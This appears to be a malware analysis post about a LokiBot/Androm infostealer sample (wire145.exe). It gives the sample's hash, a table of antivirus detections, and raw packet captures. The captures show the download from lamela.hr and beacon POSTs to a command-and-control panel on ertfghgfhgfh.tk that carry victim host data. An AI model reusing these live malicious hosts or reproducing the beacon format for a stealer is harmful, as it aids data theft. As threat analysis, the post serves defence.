Download Attachments
| SHA256: | 6c99dd395a98d20237d05527e84ef8d0d2f9f2a599494ee0632c7bfab2399e33 |
| File name: | wire145.exe |
| Detection ratio: | 37 / 61 |
| Analysis date: | 2017-05-15 02:54:56 UTC ( 0 minutes ago ) |
| Kaspersky | Backdoor.Win32.Androm.ngwk | 20170515 |
| McAfee | Artemis!F65BE5A2E77C | 20170515 |
| McAfee-GW-Edition | BehavesLike.Win32.Virus.th | 20170514 |
| eScan | Trojan.GenericKD.5065116 | 20170515 |
| NANO-Antivirus | Trojan.Win32.Androm.eotpjr | 20170514 |
| Palo Alto Networks (Known Signatures) | generic.ml | 20170515 |
| Panda | Trj/GdSda.A | 20170514 |
| Qihoo-360 | Trojan.Generic | 20170515 |
| Rising | Malware.Generic.3!tfe (cloud:DiQytucAL2U) | 20170515 |
| Sophos | Mal/Generic-S | 20170514 |
| Symantec | Infostealer.Lokibot | 20170514 |
| Tencent | Win32.Trojan.Inject.Auto | 20170515 |
| TrendMicro-HouseCall | Suspicious_GEN.F47V0513 | 20170515 |
| VIPRE | Trojan.Win32.Generic!BT | 20170515 |
| Webroot | W32.Trojan.Gen | 20170515 |
| ZoneAlarm by Check Point | Backdoor.Win32.Androm.ngwk | 20170514 |
2017-05-14 21:26:44.615814 IP 192.168.1.102.58035 > 176.62.8.9.80: Flags [P.], seq 0:394, ack 1, win 256, length 394: HTTP: GET /wire145.exe HTTP/1.1
E…Z.@…$ …f.>. …P…\i.0UP….c..GET /wire145.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: lamela.hr
Connection: Keep-Alive
2017-05-14 21:27:25.906564 IP 192.168.1.102.58037 > 42.112.16.178.80: Flags [P.], seq 0:246, ack 1, win 256, length 246: HTTP: POST /Panel/five/fre.php HTTP/1.0
E…{.@……..f*p…..PV.. M…P…k…POST /Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: ertfghgfhgfh.tk
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: CDE60214
Content-Length: 208
Connection: close
2017-05-14 21:27:26.191163 IP 192.168.1.102.58037 > 42.112.16.178.80: Flags [P.], seq 246:454, ack 1, win 256, length 208: HTTP
E…{.@……..f*p…..PV…M…P…S…..’…….ckav.ru..
…u.s.e.r.n.a.m.e.1.3.4…….W.I.N.-.F.7.0.7.6.K.T.Q.1.P.5…….W.I.N.-.F.7.0.7.6.K.T.Q.1.P.5…………………k……………..0…3.D.F.D.8.1.C.0.7.0.8.A.4.B.C.A.3.3.3.5.F.6.4.B…..dRbP1….
2017-05-14 21:28:04.178218 IP 192.168.1.102.58043 > 8.254.247.46.80: Flags [P.], seq 345:518, ack 24469, win 256, length 173: HTTP: HEAD /v9/windowsupdate/redir/muv4wuredir.cab?1705150125 HTTP/1.1
E…&.@….R…f…….P..O…..P…….HEAD /v9/windowsupdate/redir/muv4wuredir.cab?1705150125 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent
Host: download.windowsupdate.com
2017-05-14 21:30:57.454058 IP 192.168.1.102.58053 > 42.112.16.178.80: Flags [P.], seq 0:246, ack 1, win 256, length 246: HTTP: POST /Panel/five/fre.php HTTP/1.0
E…|.@……..f*p…..P”.z.p.PnP…-…POST /Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: ertfghgfhgfh.tk
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: CDE60214
Content-Length: 181
Connection: close